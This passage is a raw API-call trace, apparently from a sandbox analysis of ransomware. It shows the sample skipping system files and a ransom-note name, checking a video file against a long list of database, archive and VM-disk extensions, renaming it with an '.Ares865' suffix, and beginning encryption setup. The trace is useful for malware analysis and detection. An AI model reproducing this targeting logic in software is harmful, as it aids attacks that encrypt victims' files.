lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5957950, ftCreationTime.dwHighDateTime=0x1d4d506, ftLastAccessTime.dwLowDateTime=0x55d76880, ftLastAccessTime.dwHighDateTime=0x1d4d156, ftLastWriteTime.dwLowDateTime=0x55d76880, ftLastWriteTime.dwHighDateTime=0x1d4d156, nFileSizeHigh=0x0, nFileSizeLow=0x626e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_ibRiCNb.mkv", cAlternateFileName="")) returned 1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="aoldtz.exe") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2=".") returned 1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="..") returned 1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="windows") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="bootmgr") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="temp") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="pagefile.sys") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="boot") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="ids.txt") returned -1 [0091.900] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="ntuser.dat") returned -1 [0091.901] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="perflogs") returned -1 [0091.901] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2="MSBuild") returned -1 [0091.901] lstrlenW (lpString="_ibRiCNb.mkv") returned 12 [0091.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\Z-izuVRF CeO.mkv") returned 91 [0091.901] lstrcpyW (in: lpString1=0x2cce496, lpString2="_ibRiCNb.mkv" | out: lpString1="_ibRiCNb.mkv") returned="_ibRiCNb.mkv" [0091.901] lstrlenW (lpString="_ibRiCNb.mkv") returned 12 [0091.901] lstrlenW (lpString="Ares865") returned 7 [0091.901] lstrcmpiW (lpString1="CNb.mkv", lpString2="Ares865") returned 1 [0091.901] lstrlenW (lpString=".dll") returned 4 [0091.901] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2=".dll") returned 1 [0091.901] lstrlenW (lpString=".lnk") returned 4 [0091.901] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2=".lnk") returned 1 [0091.901] lstrlenW (lpString=".ini") returned 4 [0091.901] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2=".ini") returned 1 [0091.901] lstrlenW (lpString=".sys") returned 4 [0091.901] lstrcmpiW (lpString1="_ibRiCNb.mkv", lpString2=".sys") returned 1 [0091.901] lstrlenW (lpString="_ibRiCNb.mkv") returned 12 [0091.901] lstrlenW (lpString="bak") returned 3 [0091.901] lstrcmpiW (lpString1="mkv", lpString2="bak") returned 1 [0091.901] lstrlenW (lpString="ba_") returned 3 [0091.901] lstrcmpiW (lpString1="mkv", lpString2="ba_") returned 1 [0091.901] lstrlenW (lpString="dbb") returned 3 [0091.901] lstrcmpiW (lpString1="mkv", lpString2="dbb") returned 1 [0091.901] lstrlenW (lpString="vmdk") returned 4 [0091.901] lstrcmpiW (lpString1=".mkv", lpString2="vmdk") returned -1 [0091.901] lstrlenW (lpString="rar") returned 3 [0091.901] lstrcmpiW (lpString1="mkv", lpString2="rar") returned -1 [0091.901] lstrlenW (lpString="zip") returned 3 [0091.901] lstrcmpiW (lpString1="mkv", lpString2="zip") returned -1 [0091.901] lstrlenW (lpString="tgz") returned 3 [0091.901] lstrcmpiW (lpString1="mkv", lpString2="tgz") returned -1 [0091.901] lstrlenW (lpString="vbox") returned 4 [0091.901] lstrcmpiW (lpString1=".mkv", lpString2="vbox") returned -1 [0091.901] lstrlenW (lpString="vdi") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="vdi") returned -1 [0091.902] lstrlenW (lpString="vhd") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="vhd") returned -1 [0091.902] lstrlenW (lpString="vhdx") returned 4 [0091.902] lstrcmpiW (lpString1=".mkv", lpString2="vhdx") returned -1 [0091.902] lstrlenW (lpString="avhd") returned 4 [0091.902] lstrcmpiW (lpString1=".mkv", lpString2="avhd") returned -1 [0091.902] lstrlenW (lpString="db") returned 2 [0091.902] lstrcmpiW (lpString1="kv", lpString2="db") returned 1 [0091.902] lstrlenW (lpString="db2") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="db2") returned 1 [0091.902] lstrlenW (lpString="db3") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="db3") returned 1 [0091.902] lstrlenW (lpString="dbf") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="dbf") returned 1 [0091.902] lstrlenW (lpString="mdf") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="mdf") returned 1 [0091.902] lstrlenW (lpString="mdb") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="mdb") returned 1 [0091.902] lstrlenW (lpString="sql") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="sql") returned -1 [0091.902] lstrlenW (lpString="sqlite") returned 6 [0091.902] lstrcmpiW (lpString1="Nb.mkv", lpString2="sqlite") returned -1 [0091.902] lstrlenW (lpString="sqlite3") returned 7 [0091.902] lstrcmpiW (lpString1="CNb.mkv", lpString2="sqlite3") returned -1 [0091.902] lstrlenW (lpString="sqlitedb") returned 8 [0091.902] lstrcmpiW (lpString1="iCNb.mkv", lpString2="sqlitedb") returned -1 [0091.902] lstrlenW (lpString="xml") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="xml") returned -1 [0091.902] lstrlenW (lpString="$er") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="$er") returned 1 [0091.902] lstrlenW (lpString="4dd") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="4dd") returned 1 [0091.902] lstrlenW (lpString="4dl") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="4dl") returned 1 [0091.902] lstrlenW (lpString="^^^") returned 3 [0091.902] lstrcmpiW (lpString1="mkv", lpString2="^^^") returned 1 [0091.903] lstrlenW (lpString="abs") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="abs") returned 1 [0091.903] lstrlenW (lpString="abx") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="abx") returned 1 [0091.903] lstrlenW (lpString="accdb") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accdb") returned 1 [0091.903] lstrlenW (lpString="accdc") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accdc") returned 1 [0091.903] lstrlenW (lpString="accde") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accde") returned 1 [0091.903] lstrlenW (lpString="accdr") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accdr") returned 1 [0091.903] lstrlenW (lpString="accdt") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accdt") returned 1 [0091.903] lstrlenW (lpString="accdw") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accdw") returned 1 [0091.903] lstrlenW (lpString="accft") returned 5 [0091.903] lstrcmpiW (lpString1="b.mkv", lpString2="accft") returned 1 [0091.903] lstrlenW (lpString="adb") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0091.903] lstrlenW (lpString="adb") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0091.903] lstrlenW (lpString="ade") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="ade") returned 1 [0091.903] lstrlenW (lpString="adf") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="adf") returned 1 [0091.903] lstrlenW (lpString="adn") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="adn") returned 1 [0091.903] lstrlenW (lpString="adp") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="adp") returned 1 [0091.903] lstrlenW (lpString="alf") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="alf") returned 1 [0091.903] lstrlenW (lpString="ask") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="ask") returned 1 [0091.903] lstrlenW (lpString="btr") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="btr") returned 1 [0091.903] lstrlenW (lpString="cat") returned 3 [0091.903] lstrcmpiW (lpString1="mkv", lpString2="cat") returned 1 [0091.904] lstrlenW (lpString="cdb") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="cdb") returned 1 [0091.904] lstrlenW (lpString="ckp") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="ckp") returned 1 [0091.904] lstrlenW (lpString="cma") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="cma") returned 1 [0091.904] lstrlenW (lpString="cpd") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="cpd") returned 1 [0091.904] lstrlenW (lpString="dacpac") returned 6 [0091.904] lstrcmpiW (lpString1="Nb.mkv", lpString2="dacpac") returned 1 [0091.904] lstrlenW (lpString="dad") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dad") returned 1 [0091.904] lstrlenW (lpString="dadiagrams") returned 10 [0091.904] lstrcmpiW (lpString1="bRiCNb.mkv", lpString2="dadiagrams") returned -1 [0091.904] lstrlenW (lpString="daschema") returned 8 [0091.904] lstrcmpiW (lpString1="iCNb.mkv", lpString2="daschema") returned 1 [0091.904] lstrlenW (lpString="db-journal") returned 10 [0091.904] lstrcmpiW (lpString1="bRiCNb.mkv", lpString2="db-journal") returned -1 [0091.904] lstrlenW (lpString="db-shm") returned 6 [0091.904] lstrcmpiW (lpString1="Nb.mkv", lpString2="db-shm") returned 1 [0091.904] lstrlenW (lpString="db-wal") returned 6 [0091.904] lstrcmpiW (lpString1="Nb.mkv", lpString2="db-wal") returned 1 [0091.904] lstrlenW (lpString="dbc") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dbc") returned 1 [0091.904] lstrlenW (lpString="dbs") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dbs") returned 1 [0091.904] lstrlenW (lpString="dbt") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dbt") returned 1 [0091.904] lstrlenW (lpString="dbv") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dbv") returned 1 [0091.904] lstrlenW (lpString="dbx") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dbx") returned 1 [0091.904] lstrlenW (lpString="dcb") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dcb") returned 1 [0091.904] lstrlenW (lpString="dct") returned 3 [0091.904] lstrcmpiW (lpString1="mkv", lpString2="dct") returned 1 [0091.904] lstrlenW (lpString="dcx") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="dcx") returned 1 [0091.905] lstrlenW (lpString="ddl") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="ddl") returned 1 [0091.905] lstrlenW (lpString="dlis") returned 4 [0091.905] lstrcmpiW (lpString1=".mkv", lpString2="dlis") returned -1 [0091.905] lstrlenW (lpString="dp1") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="dp1") returned 1 [0091.905] lstrlenW (lpString="dqy") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="dqy") returned 1 [0091.905] lstrlenW (lpString="dsk") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="dsk") returned 1 [0091.905] lstrlenW (lpString="dsn") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="dsn") returned 1 [0091.905] lstrlenW (lpString="dtsx") returned 4 [0091.905] lstrcmpiW (lpString1=".mkv", lpString2="dtsx") returned -1 [0091.905] lstrlenW (lpString="dxl") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="dxl") returned 1 [0091.905] lstrlenW (lpString="eco") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="eco") returned 1 [0091.905] lstrlenW (lpString="ecx") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="ecx") returned 1 [0091.905] lstrlenW (lpString="edb") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="edb") returned 1 [0091.905] lstrlenW (lpString="epim") returned 4 [0091.905] lstrcmpiW (lpString1=".mkv", lpString2="epim") returned -1 [0091.905] lstrlenW (lpString="fcd") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="fcd") returned 1 [0091.905] lstrlenW (lpString="fdb") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="fdb") returned 1 [0091.905] lstrlenW (lpString="fic") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="fic") returned 1 [0091.905] lstrlenW (lpString="flexolibrary") returned 12 [0091.905] lstrlenW (lpString="fm5") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="fm5") returned 1 [0091.905] lstrlenW (lpString="fmp") returned 3 [0091.905] lstrcmpiW (lpString1="mkv", lpString2="fmp") returned 1 [0091.905] lstrlenW (lpString="fmp12") returned 5 [0091.905] lstrcmpiW (lpString1="b.mkv", lpString2="fmp12") returned -1 [0091.906] lstrlenW (lpString="fmpsl") returned 5 [0091.906] lstrcmpiW (lpString1="b.mkv", lpString2="fmpsl") returned -1 [0091.906] lstrlenW (lpString="fol") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="fol") returned 1 [0091.906] lstrlenW (lpString="fp3") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="fp3") returned 1 [0091.906] lstrlenW (lpString="fp4") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="fp4") returned 1 [0091.906] lstrlenW (lpString="fp5") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="fp5") returned 1 [0091.906] lstrlenW (lpString="fp7") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="fp7") returned 1 [0091.906] lstrlenW (lpString="fpt") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="fpt") returned 1 [0091.906] lstrlenW (lpString="frm") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="frm") returned 1 [0091.906] lstrlenW (lpString="gdb") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="gdb") returned 1 [0091.906] lstrlenW (lpString="gdb") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="gdb") returned 1 [0091.906] lstrlenW (lpString="grdb") returned 4 [0091.906] lstrcmpiW (lpString1=".mkv", lpString2="grdb") returned -1 [0091.906] lstrlenW (lpString="gwi") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="gwi") returned 1 [0091.906] lstrlenW (lpString="hdb") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="hdb") returned 1 [0091.906] lstrlenW (lpString="his") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="his") returned 1 [0091.906] lstrlenW (lpString="ib") returned 2 [0091.906] lstrcmpiW (lpString1="kv", lpString2="ib") returned 1 [0091.906] lstrlenW (lpString="idb") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="idb") returned 1 [0091.906] lstrlenW (lpString="ihx") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="ihx") returned 1 [0091.906] lstrlenW (lpString="itdb") returned 4 [0091.906] lstrcmpiW (lpString1=".mkv", lpString2="itdb") returned -1 [0091.906] lstrlenW (lpString="itw") returned 3 [0091.906] lstrcmpiW (lpString1="mkv", lpString2="itw") returned 1 [0091.907] lstrlenW (lpString="jet") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="jet") returned 1 [0091.907] lstrlenW (lpString="jtx") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="jtx") returned 1 [0091.907] lstrlenW (lpString="kdb") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="kdb") returned 1 [0091.907] lstrlenW (lpString="kexi") returned 4 [0091.907] lstrcmpiW (lpString1=".mkv", lpString2="kexi") returned -1 [0091.907] lstrlenW (lpString="kexic") returned 5 [0091.907] lstrcmpiW (lpString1="b.mkv", lpString2="kexic") returned -1 [0091.907] lstrlenW (lpString="kexis") returned 5 [0091.907] lstrcmpiW (lpString1="b.mkv", lpString2="kexis") returned -1 [0091.907] lstrlenW (lpString="lgc") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="lgc") returned 1 [0091.907] lstrlenW (lpString="lwx") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="lwx") returned 1 [0091.907] lstrlenW (lpString="maf") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="maf") returned 1 [0091.907] lstrlenW (lpString="maq") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="maq") returned 1 [0091.907] lstrlenW (lpString="mar") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="mar") returned 1 [0091.907] lstrlenW (lpString="marshal") returned 7 [0091.907] lstrcmpiW (lpString1="CNb.mkv", lpString2="marshal") returned -1 [0091.907] lstrlenW (lpString="mas") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="mas") returned 1 [0091.907] lstrlenW (lpString="mav") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="mav") returned 1 [0091.907] lstrlenW (lpString="maw") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="maw") returned 1 [0091.907] lstrlenW (lpString="mdbhtml") returned 7 [0091.907] lstrcmpiW (lpString1="CNb.mkv", lpString2="mdbhtml") returned -1 [0091.907] lstrlenW (lpString="mdn") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="mdn") returned 1 [0091.907] lstrlenW (lpString="mdt") returned 3 [0091.907] lstrcmpiW (lpString1="mkv", lpString2="mdt") returned 1 [0091.907] lstrlenW (lpString="mfd") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="mfd") returned 1 [0091.908] lstrlenW (lpString="mpd") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="mpd") returned -1 [0091.908] lstrlenW (lpString="mrg") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="mrg") returned -1 [0091.908] lstrlenW (lpString="mud") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="mud") returned -1 [0091.908] lstrlenW (lpString="mwb") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="mwb") returned -1 [0091.908] lstrlenW (lpString="myd") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="myd") returned -1 [0091.908] lstrlenW (lpString="ndf") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="ndf") returned -1 [0091.908] lstrlenW (lpString="nnt") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="nnt") returned -1 [0091.908] lstrlenW (lpString="nrmlib") returned 6 [0091.908] lstrcmpiW (lpString1="Nb.mkv", lpString2="nrmlib") returned -1 [0091.908] lstrlenW (lpString="ns2") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="ns2") returned -1 [0091.908] lstrlenW (lpString="ns3") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="ns3") returned -1 [0091.908] lstrlenW (lpString="ns4") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="ns4") returned -1 [0091.908] lstrlenW (lpString="nsf") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="nsf") returned -1 [0091.908] lstrlenW (lpString="nv") returned 2 [0091.908] lstrcmpiW (lpString1="kv", lpString2="nv") returned -1 [0091.908] lstrlenW (lpString="nv2") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="nv2") returned -1 [0091.908] lstrlenW (lpString="nwdb") returned 4 [0091.908] lstrcmpiW (lpString1=".mkv", lpString2="nwdb") returned -1 [0091.908] lstrlenW (lpString="nyf") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="nyf") returned -1 [0091.908] lstrlenW (lpString="odb") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="odb") returned -1 [0091.908] lstrlenW (lpString="odb") returned 3 [0091.908] lstrcmpiW (lpString1="mkv", lpString2="odb") returned -1 [0091.908] lstrlenW (lpString="oqy") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="oqy") returned -1 [0091.909] lstrlenW (lpString="ora") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="ora") returned -1 [0091.909] lstrlenW (lpString="orx") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="orx") returned -1 [0091.909] lstrlenW (lpString="owc") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="owc") returned -1 [0091.909] lstrlenW (lpString="p96") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="p96") returned -1 [0091.909] lstrlenW (lpString="p97") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="p97") returned -1 [0091.909] lstrlenW (lpString="pan") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="pan") returned -1 [0091.909] lstrlenW (lpString="pdb") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="pdb") returned -1 [0091.909] lstrlenW (lpString="pdm") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="pdm") returned -1 [0091.909] lstrlenW (lpString="pnz") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="pnz") returned -1 [0091.909] lstrlenW (lpString="qry") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="qry") returned -1 [0091.909] lstrlenW (lpString="qvd") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="qvd") returned -1 [0091.909] lstrlenW (lpString="rbf") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="rbf") returned -1 [0091.909] lstrlenW (lpString="rctd") returned 4 [0091.909] lstrcmpiW (lpString1=".mkv", lpString2="rctd") returned -1 [0091.909] lstrlenW (lpString="rod") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="rod") returned -1 [0091.909] lstrlenW (lpString="rodx") returned 4 [0091.909] lstrcmpiW (lpString1=".mkv", lpString2="rodx") returned -1 [0091.909] lstrlenW (lpString="rpd") returned 3 [0091.909] lstrcmpiW (lpString1="mkv", lpString2="rpd") returned -1 [0091.910] lstrlenW (lpString="rsd") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="rsd") returned -1 [0091.910] lstrlenW (lpString="sas7bdat") returned 8 [0091.910] lstrcmpiW (lpString1="iCNb.mkv", lpString2="sas7bdat") returned -1 [0091.910] lstrlenW (lpString="sbf") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="sbf") returned -1 [0091.910] lstrlenW (lpString="scx") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="scx") returned -1 [0091.910] lstrlenW (lpString="sdb") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="sdb") returned -1 [0091.910] lstrlenW (lpString="sdc") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="sdc") returned -1 [0091.910] lstrlenW (lpString="sdf") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="sdf") returned -1 [0091.910] lstrlenW (lpString="sis") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="sis") returned -1 [0091.910] lstrlenW (lpString="spq") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="spq") returned -1 [0091.910] lstrlenW (lpString="te") returned 2 [0091.910] lstrcmpiW (lpString1="kv", lpString2="te") returned -1 [0091.910] lstrlenW (lpString="teacher") returned 7 [0091.910] lstrcmpiW (lpString1="CNb.mkv", lpString2="teacher") returned -1 [0091.910] lstrlenW (lpString="tmd") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="tmd") returned -1 [0091.910] lstrlenW (lpString="tps") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="tps") returned -1 [0091.910] lstrlenW (lpString="trc") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="trc") returned -1 [0091.910] lstrlenW (lpString="trc") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="trc") returned -1 [0091.910] lstrlenW (lpString="trm") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="trm") returned -1 [0091.910] lstrlenW (lpString="udb") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="udb") returned -1 [0091.910] lstrlenW (lpString="udl") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="udl") returned -1 [0091.910] lstrlenW (lpString="usr") returned 3 [0091.910] lstrcmpiW (lpString1="mkv", lpString2="usr") returned -1 [0091.911] lstrlenW (lpString="v12") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="v12") returned -1 [0091.911] lstrlenW (lpString="vis") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="vis") returned -1 [0091.911] lstrlenW (lpString="vpd") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="vpd") returned -1 [0091.911] lstrlenW (lpString="vvv") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="vvv") returned -1 [0091.911] lstrlenW (lpString="wdb") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="wdb") returned -1 [0091.911] lstrlenW (lpString="wmdb") returned 4 [0091.911] lstrcmpiW (lpString1=".mkv", lpString2="wmdb") returned -1 [0091.911] lstrlenW (lpString="wrk") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="wrk") returned -1 [0091.911] lstrlenW (lpString="xdb") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="xdb") returned -1 [0091.911] lstrlenW (lpString="xld") returned 3 [0091.911] lstrcmpiW (lpString1="mkv", lpString2="xld") returned -1 [0091.911] lstrlenW (lpString="xmlff") returned 5 [0091.911] lstrcmpiW (lpString1="b.mkv", lpString2="xmlff") returned -1 [0091.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\_ibRiCNb.mkv.Ares865") returned 95 [0091.911] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\_ibRiCNb.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\_ibricnb.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\_ibRiCNb.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\_ibricnb.mkv.ares865"), dwFlags=0x1) returned 1 [0091.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\_ibRiCNb.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\_ibricnb.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.912] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25198) returned 1 [0091.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.912] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.913] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.913] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.913] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6570, lpName=0x0) returned 0x15c [0091.913] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6570) returned 0x190000 [0091.914] CryptAcquireContextW (in: phProv=0x2ccce04, 